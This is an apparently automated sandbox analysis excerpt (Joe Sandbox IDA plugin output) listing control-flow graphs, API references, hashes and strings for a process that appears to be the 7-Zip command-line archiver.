                                                                                                                                                                                                                                            • Part of subcall function 003394A8: free.MSVCRT ref: 003394DB
                                                                                                                                                                                                                                            • Part of subcall function 003394A8: free.MSVCRT ref: 003394E3
                                                                                                                                                                                                                                            • Part of subcall function 003394A8: free.MSVCRT ref: 003394F0
                                                                                                                                                                                                                                            • Part of subcall function 003394A8: free.MSVCRT ref: 0033951C
                                                                                                                                                                                                                                            • Part of subcall function 003394A8: free.MSVCRT ref: 00339525
                                                                                                                                                                                                                                            • Part of subcall function 003394A8: free.MSVCRT ref: 0033952D
                                                                                                                                                                                                                                            • Part of subcall function 003394A8: free.MSVCRT ref: 0033953A
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0033AEC2
                                                                                                                                                                                                                                            • Part of subcall function 0031339C: free.MSVCRT ref: 003133D7
                                                                                                                                                                                                                                            • Part of subcall function 0031339C: memmove.MSVCRT(00000000,?,?,00000000,003110A8), ref: 003133F2
                                                                                                                                                                                                                                            • Part of subcall function 0033A9FC: free.MSVCRT ref: 0033AA95
                                                                                                                                                                                                                                            • Part of subcall function 0033A9FC: free.MSVCRT ref: 0033AAC5
                                                                                                                                                                                                                                            • Part of subcall function 0033A9FC: free.MSVCRT ref: 0033AAD2
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0033AEFA
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0033AF4D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memmove$AddressProc
                                                                                                                                                                                                                                          • String ID: 7z.dll$Codecs\$Formats\$SetCodecs
                                                                                                                                                                                                                                          • API String ID: 4053071709-2499791885
                                                                                                                                                                                                                                          • Opcode ID: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
                                                                                                                                                                                                                                          • Instruction ID: 57a42233806547e9e854406e666b098f2784d5b6b2f26852b31f4ebbab02420d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FB1B466214AC096CB32EB21E4903AFB764F385798F504216EBCE4BB25DF7DC5A9C701

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 3343 351850-351886 EnterCriticalSection 3344 3518b1-3518bb 3343->3344 3345 351888-35188e call 35b1c8 3343->3345 3346 3518c2-3518c4 3344->3346 3347 3518bd call 3122e4 3344->3347 3349 351893-3518ac 3345->3349 3351 351991-35199e 3346->3351 3352 3518ca-3518d2 3346->3352 3347->3346 3349->3344 3355 3519a4-3519a7 3351->3355 3356 351a4e-351a57 LeaveCriticalSection 3351->3356 3353 3518d4-3518da 3352->3353 3354 35191a-35192b 3352->3354 3353->3354 3357 3518dc-3518e2 3353->3357 3360 35192d-35193a call 312300 3354->3360 3361 35196a-351974 3354->3361 3355->3356 3358 3519ad-3519b7 3355->3358 3359 351a59-351a62 3356->3359 3365 3518e4-3518eb 3357->3365 3366 3518ed 3357->3366 3363 351a31-351a4c LeaveCriticalSection 3358->3363 3367 3519b9-3519d7 call 312300 fputs 3358->3367 3360->3361 3373 35193c-351965 fputs call 3126a0 call 312300 3360->3373 3361->3363 3364 35197a-351981 3361->3364 3363->3359 3364->3363 3369 351987-35198c call 3122e4 3364->3369 3370 3518f4-3518fe 3365->3370 3366->3370 3376 3519f2-351a14 call 316618 call 312320 free 3367->3376 3377 3519d9-3519f0 fputs 3367->3377 3369->3363 3370->3361 3375 351900-351913 fputs call 312300 3370->3375 3373->3361 3384 351918 3375->3384 3381 351a19-351a2c call 312300 call 3122e4 3376->3381 3377->3381 3381->3363 3384->3361
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 00351877
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 0035190A
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32 ref: 00351A44
                                                                                                                                                                                                                                            • Part of subcall function 0035B1C8: memset.MSVCRT ref: 0035B20D
                                                                                                                                                                                                                                            • Part of subcall function 0035B1C8: fputs.MSVCRT ref: 0035B232
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 0035194D
                                                                                                                                                                                                                                            • Part of subcall function 003126A0: fputs.MSVCRT ref: 003126C1
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 003519CB
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 003519EA
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32 ref: 00351A51
                                                                                                                                                                                                                                            • Part of subcall function 00312300: fputc.MSVCRT ref: 00312311
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00351A14
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                                                                                                                                                                                                                          • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                                                                                                                                                                                                                          • API String ID: 676172275-580504279
                                                                                                                                                                                                                                          • Opcode ID: 00b0e537d4ffefddec52b66757bd7e4d904c0f2f8dd17a6a25b95f70ab0f44f6
                                                                                                                                                                                                                                          • Instruction ID: bc5a80905011d979f7ba5c6dcb4d8d3a7e427c34106ccbd96bf60eca6b50b8ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00b0e537d4ffefddec52b66757bd7e4d904c0f2f8dd17a6a25b95f70ab0f44f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D351A066305A81A6EB2F9F25D9A07ED6324F748B91F454122DF6E0B760CF38D4B9C300

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 3392 3338e8-333977 call 331700 call 33373c memmove 3397 333992-3339a5 3392->3397 3398 333979-33398d call 333864 free 3392->3398 3400 333a30-333a3d call 333864 3397->3400 3401 3339ab 3397->3401 3405 333cb6-333cc9 3398->3405 3410 333a65-333a77 3400->3410 3411 333a3f-333a64 call 3302a0 _CxxThrowException 3400->3411 3404 3339ae-3339c2 3401->3404 3407 3339c4-3339ec call 3309e0 call 312130 3404->3407 3408 333a1d-333a25 3404->3408 3424 3339fb 3407->3424 3425 3339ee-3339f9 call 313314 3407->3425 3408->3404 3409 333a27-333a2b 3408->3409 3409->3400 3415 333ae1-333b27 call 345f5c call 3313e8 * 2 3410->3415 3416 333a79-333a7c 3410->3416 3411->3410 3439 333c2a-333c46 free 3415->3439 3440 333b2d-333b30 3415->3440 3420 333a7e-333aac call 313208 call 316e10 call 312130 3416->3420 3443 333aae-333abb call 313314 3420->3443 3444 333abd 3420->3444 3430 3339fe-333a16 call 31b8f0 free 3424->3430 3425->3430 3430->3408 3445 333c76-333c84 free 3439->3445 3446 333c48 3439->3446 3442 333b33-333b56 call 312130 3440->3442 3460 333b68 3442->3460 3461 333b58-333b66 call 313314 3442->3461 3449 333ac0-333adf call 31b8f0 free 3443->3449 3444->3449 3451 333c88-333c95 3445->3451 3450 333c4c-333c5f 3446->3450 3449->3415 3449->3420 3457 333c71-333c74 3450->3457 3458 333c61-333c6c free * 2 3450->3458 3452 333ca7-333caa 3451->3452 3453 333c97-333ca2 free * 2 3451->3453 3452->3451 3459 333cac-333cb4 free 3452->3459 3453->3452 3457->3445 3457->3450 3458->3457 3459->3405 3464 333b6b-333ba1 call 312130 3460->3464 3461->3464 3468 333bb3 3464->3468 3469 333ba3-333bb1 call 313314 3464->3469 3470 333bb6-333bc6 3468->3470 3469->3470 3472 333be4-333bf2 3470->3472 3473 333bc8-333be2 call 314338 3470->3473 3472->3442 3476 333bf8 3472->3476 3473->3472 3478 333bfa-333c29 call 3302a0 _CxxThrowException 3473->3478 3476->3439 3478->3439
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0033373C: free.MSVCRT ref: 003337FB
                                                                                                                                                                                                                                          • memmove.MSVCRT ref: 0033396F
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00333986
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00333A11
                                                                                                                                                                                                                                          • _CxxThrowException.MSVCRT ref: 00333A5F
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00333AD3
                                                                                                                                                                                                                                            • Part of subcall function 00333864: free.MSVCRT ref: 00333877
                                                                                                                                                                                                                                            • Part of subcall function 00333864: free.MSVCRT ref: 00333892
                                                                                                                                                                                                                                            • Part of subcall function 00333864: free.MSVCRT ref: 0033389B
                                                                                                                                                                                                                                            • Part of subcall function 00333864: free.MSVCRT ref: 003338C6
                                                                                                                                                                                                                                            • Part of subcall function 00333864: free.MSVCRT ref: 003338CE
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                                                          • String ID: Cannot find archive$Duplicate archive path:
                                                                                                                                                                                                                                          • API String ID: 3934437811-2067063536
                                                                                                                                                                                                                                          • Opcode ID: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
                                                                                                                                                                                                                                          • Instruction ID: 06d6d88255d51e0347f311dc7f6aae5c066db69ce9b08ca8a62499ba834fa04a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55A18672315A8492CA26EB15E4D069FB361F7C9BD0F409511EF8E5BB29DF38C996CB00

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 3481 3442a2-3442c0 3483 3442d5-3442d8 3481->3483 3484 3442c2-3442d0 3481->3484 3485 3442e0-3443ab call 3340c4 memmove call 313404 call 343a20 3483->3485 3486 3442da 3483->3486 3484->3483 3494 3443b1-3443b3 3485->3494 3495 3445d8-34468f call 313404 * 3 free * 2 call 33419c 3485->3495 3486->3485 3496 3446c5-3446f4 free * 2 call 33419c 3494->3496 3497 3443b9-3443d7 call 33c684 3494->3497 3534 344691-344697 3495->3534 3535 344698-3446a0 3495->3535 3506 3446f6-3446fc 3496->3506 3507 3446fd-344705 3496->3507 3508 3443dd-3443ef call 312130 3497->3508 3509 344728-344757 free * 2 call 33419c 3497->3509 3506->3507 3513 344707-34470d 3507->3513 3514 34470e-344719 3507->3514 3525 3443f1-344401 call 33caac 3508->3525 3526 344403 3508->3526 3522 344760-344768 3509->3522 3523 344759-34475f 3509->3523 3513->3514 3519 344721-344723 3514->3519 3520 34471b 3514->3520 3521 3447fe-344811 3519->3521 3520->3519 3529 344771-34477c 3522->3529 3530 34476a-344770 3522->3530 3523->3522 3532 344406-344441 call 31b8f0 free * 2 call 33419c 3525->3532 3526->3532 3536 344784-344786 3529->3536 3537 34477e 3529->3537 3530->3529 3551 344443-344449 3532->3551 3552 34444a-344452 3532->3552 3534->3535 3542 3446a2-3446a8 3535->3542 3543 3446a9-3446b4 3535->3543 3536->3521 3544 3447f2-3447fb 3536->3544 3537->3536 3542->3543 3543->3544 3547 3446ba-3446c0 3543->3547 3544->3521 3547->3544 3551->3552 3553 344454-34445a 3552->3553 3554 34445b-34446c 3552->3554 3553->3554 3556 344472-344478 3554->3556 3557 343fa9-344033 memmove 3554->3557 3556->3557 3560 344054-344072 memmove 3557->3560 3561 344035-344052 memmove 3557->3561 3560->3544 3563 344078-3440e9 memmove call 33c0fc call 313404 * 2 call 343d58 3560->3563 3561->3563 3573 3440ee-3440f2 3563->3573 3574 34447d-344480 3573->3574 3575 3440f8-34410a call 312130 3573->3575 3577 344486-34450b call 313404 * 3 3574->3577 3578 34450c-34451b call 33419c 3574->3578 3583 34410c-34411c call 33caac 3575->3583 3584 34411e 3575->3584 3577->3578 3578->3521 3588 344121-34413a call 31b8f0 call 33419c 3583->3588 3584->3588
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1534225298-3916222277
                                                                                                                                                                                                                                          • Opcode ID: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
                                                                                                                                                                                                                                          • Instruction ID: 487d089bd76c1734a4a4b6262eb38083c7b933b004c0f859bf570ae5dde98f35
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAD12037209BC496CB26DB65E09029EBBA0F7C6B44F445026DB8E4BB25DF7CD599CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$memmove
                                                                                                                                                                                                                                          • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                                                                                                                                                                                                                                          • API String ID: 2879976980-73314117
                                                                                                                                                                                                                                          • Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                                                                                          • Instruction ID: 933a84f80f6e891c17ba836c3e0a31b2800f7c5d6a9971b3627b7c38b6659324
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12418BB6214A41D6DB21DF21F8C079EB365F784794F414526EB8E87764DFB8C945CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00351CF9
                                                                                                                                                                                                                                            • Part of subcall function 0035B1C8: memset.MSVCRT ref: 0035B20D
                                                                                                                                                                                                                                            • Part of subcall function 0035B1C8: fputs.MSVCRT ref: 0035B232
                                                                                                                                                                                                                                            • Part of subcall function 00312300: fputc.MSVCRT ref: 00312311
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00351DEE
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00351F07
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00351F5C
                                                                                                                                                                                                                                            • Part of subcall function 0035171C: fputs.MSVCRT ref: 00351744
                                                                                                                                                                                                                                            • Part of subcall function 0035171C: fputs.MSVCRT ref: 00351758
                                                                                                                                                                                                                                            • Part of subcall function 0035171C: free.MSVCRT ref: 0035176B
                                                                                                                                                                                                                                            • Part of subcall function 00316618: FormatMessageW.KERNEL32 ref: 00316676
                                                                                                                                                                                                                                            • Part of subcall function 00316618: LocalFree.KERNEL32 ref: 00316698
                                                                                                                                                                                                                                            • Part of subcall function 00312320: free.MSVCRT ref: 0031237E
                                                                                                                                                                                                                                            • Part of subcall function 00312320: fputs.MSVCRT ref: 003123B8
                                                                                                                                                                                                                                            • Part of subcall function 00312320: free.MSVCRT ref: 003123C4
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00351F86
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputs$free$FormatFreeLocalMessagefputcmemset
                                                                                                                                                                                                                                          • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                                                          • API String ID: 2553544393-24972044
                                                                                                                                                                                                                                          • Opcode ID: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                                                                                                                                                                                          • Instruction ID: c1c828ccffb27979b84786b2bd4d1c11d656e05174cc8c0848e342464c306298
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1A170667006C4AACA6FEF71D5917EEB320F749B81F454526DF6E0B621DF68D8A8C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$ExceptionThrowfputs
                                                                                                                                                                                                                                          • String ID: Decoding ERROR
                                                                                                                                                                                                                                          • API String ID: 117389134-2585761706
                                                                                                                                                                                                                                          • Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                                                                                          • Instruction ID: 34df940b4583888470401bf14660331c2b467d79ff45803ee4a732062a887bb1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E931F6623149C195CA33EB25E880BAE6360F786781F445622CE8E4B778DF38C989C701
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00316464: FreeLibrary.KERNELBASE(?,?,?,003164E7), ref: 00316475
                                                                                                                                                                                                                                            • Part of subcall function 00313404: free.MSVCRT ref: 00313431
                                                                                                                                                                                                                                            • Part of subcall function 00313404: memmove.MSVCRT ref: 0031344C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0033A8CA
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0033A8E8
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0033A908
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0033A985
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0033A996
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProcfree$FreeLibrarymemmove
                                                                                                                                                                                                                                          • String ID: CreateObject$SetCaseSensitive$SetLargePageMode
                                                                                                                                                                                                                                          • API String ID: 852969883-606380122
                                                                                                                                                                                                                                          • Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                                                                                          • Instruction ID: 95ca8001bd6bb43c1158cea4ee1944f701c6ac0c6941c1f713154786c911132c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4241C536201F4096DB26EF26E89075E7760FB89B94F058524DFCA4B765DF38C585C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • strcmp.MSVCRT ref: 0035B723
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 0035B743
                                                                                                                                                                                                                                            • Part of subcall function 003138C8: memmove.MSVCRT(0031A0E5), ref: 00313907
                                                                                                                                                                                                                                            • Part of subcall function 00313A64: memmove.MSVCRT ref: 00313AAA
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0035B49E
                                                                                                                                                                                                                                            • Part of subcall function 00313404: free.MSVCRT ref: 00313431
                                                                                                                                                                                                                                            • Part of subcall function 00313404: memmove.MSVCRT ref: 0031344C
                                                                                                                                                                                                                                          • strcmp.MSVCRT ref: 0035B4E3
                                                                                                                                                                                                                                          • wcscmp.MSVCRT ref: 0035B502
                                                                                                                                                                                                                                          • strcmp.MSVCRT ref: 0035B568
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                          • API String ID: 591578422-4150638102
                                                                                                                                                                                                                                          • Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                                                                                          • Instruction ID: 25c72fcdd540ddf8ae4ab17982726a0e3b3ed3978f19dc7b52c56db8f1354828
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88A15D77700A84A7CB1EDF2AD69069DB361F748785F808016DB5A47B21EF34E9BAC740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00352F7E
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00352F9D
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00352FB6
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00352FC1
                                                                                                                                                                                                                                            • Part of subcall function 00312C78: free.MSVCRT ref: 00312CAE
                                                                                                                                                                                                                                            • Part of subcall function 00312320: free.MSVCRT ref: 0031237E
                                                                                                                                                                                                                                            • Part of subcall function 00312320: fputs.MSVCRT ref: 003123B8
                                                                                                                                                                                                                                            • Part of subcall function 00312320: free.MSVCRT ref: 003123C4
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00352FCC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
